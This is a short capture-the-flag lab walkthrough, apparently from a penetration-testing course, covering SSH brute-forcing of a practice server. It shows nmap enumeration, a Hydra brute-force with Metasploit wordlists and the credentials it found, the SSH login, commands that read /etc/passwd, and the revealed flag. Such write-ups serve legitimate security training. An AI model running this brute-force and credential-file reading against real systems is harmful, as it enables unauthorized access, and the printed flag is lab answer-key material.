🔬SSH

Lab 1

🔬 SSH Login
Target IP: 192.63.218.3
Brute-force of OpenSSH server
Enumeration and nmap scripts have been already covered in this SSH Enum lab

Enumeration

ip -br -c a

nmap -sV 192.63.218.3

22/tcp open  ssh  OpenSSH 7.9p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)

📌 OpenSSH 7.9p1 cannot be exploited directly

Brute-Force

Metasploit ssh_login module or Hydra tool can be utilized for brute forcing the SSH password

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt 192.63.218.3 -t 4 ssh

[22][ssh] host: 192.63.218.3   login: sysadmin   password: hailey
[STATUS] 77.00 tries/min, 77 tries in 00:01h, 273 to do in 00:04h, 4 active
[22][ssh] host: 192.63.218.3   login: rooty   password: pineapple
[...]

ssh [email protected]

groups sysadmin
cat /etc/*release
uname -r
cat /etc/passwd
find / -name "flag"
cat /flag

Reveal Flag: 🚩

eb09cc6f1cd72756da145892892fbf5a

Previous🔬FTP Next🔬SAMBA

Last updated 2 years ago

Was this helpful?